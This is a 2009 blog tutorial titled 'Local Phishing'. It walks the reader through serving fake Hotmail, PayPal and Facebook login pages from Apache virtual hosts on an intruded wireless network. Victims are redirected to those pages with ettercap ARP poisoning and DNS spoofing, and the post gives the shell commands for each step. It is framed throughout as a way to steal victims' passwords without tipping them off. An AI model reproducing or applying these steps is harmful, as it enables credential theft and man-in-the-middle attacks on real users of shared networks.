Sep 1, 2009

Local Phishing

 Local Phishing
 I'v never seen a tutorial on how to do this so I figured I'd make one.

Ok so you may be asking whats the point of this? Well let me tell you.

Say you broke into a wireless network and want to get some passwords.
You arp poison your victims and use an ssl stripping tool to be able to sniff passwords.
The target gets tipped off by the certificate warning. So you fail.
So you want to dsn spoof your target to a phisher.
But the problem is that you can only dns spoof to an ip address.
This means you cannot spoof them to a phisher on a free hosting domain.
You set up apache hosting your phisher and dns spoof them to your local ip.
This is great, but you're limited to only one phisher.
This tutorial will show you how to set up multiple Ip's and the set up virual hosts in apache for those ips.

Step 1: Set multiple IP's

Let's make 3. (you can have as many as you want)

sudo ifconfig wlan0:1 up
sudo ifconfig wlan0:2 up
sudo ifconfig wlan0:3 up
Some times it will give you an error like this.

SIOCSIFFLAGS: Cannot assign requested address
If you just type in the same command again it should work

Ok now check if they're up

sudo ifconfig -a
you should see your new virtual interfaces. (wlan0:1, wlan0:2, wlan0:3)

Step 2: Set up apache

sudo nautilus /var/www/
Create 3 folders, one for each phisher. I'll be using hotmail, paypal and facebook.


put you phishers in those folders.
(When I do this I edit my phishers so they all write to one log file so it's easier to keep track of what you got.)

Now you need to edit the apache2.conf file.
sudo nautilus /etc/apache2/sites-enabled/
Open the configuration file in there (mine was called 000-default).
Now you need to add a virtual host entry for every one of your ip addresses.
Make sure to change the ServerName and DocumentRoot to match your setup.
In my case i'll add three. (You add these to the bottom of the file)


DocumentRoot /var/www/facebook/

DocumentRoot /var/www/paypal/

DocumentRoot /var/www/phish/hotmail/
Start apache

sudo /etc/init.d/apache2 start
Open up firefox and browse to each one of your ips and make sure the phishers come up.

Step 3: Dns spoof/Arp poison with ettercap

Backup the dns_spoof configuration file

sudo mv /usr/share/ettercap/etter.dns /usr/share/ettercap/etter.dns.backup
Edit the file

sudo echo " A" >> /usr/share/ettercap/etter.dns
sudo echo " A" >> /usr/share/ettercap/etter.dns
sudo echo " A" >> /usr/share/ettercap/etter.dns
Start ettercap arp poison with the dns_spoof plugin

sudo ettercap -T -i wlan0 -M arp:remote / / -P dns_spoof
replace with your target's ip.
replace with your gateway ip.
replace wlan0 with your interface.
# ITS ©
# 2008 - 2009

No comments:

Post a Comment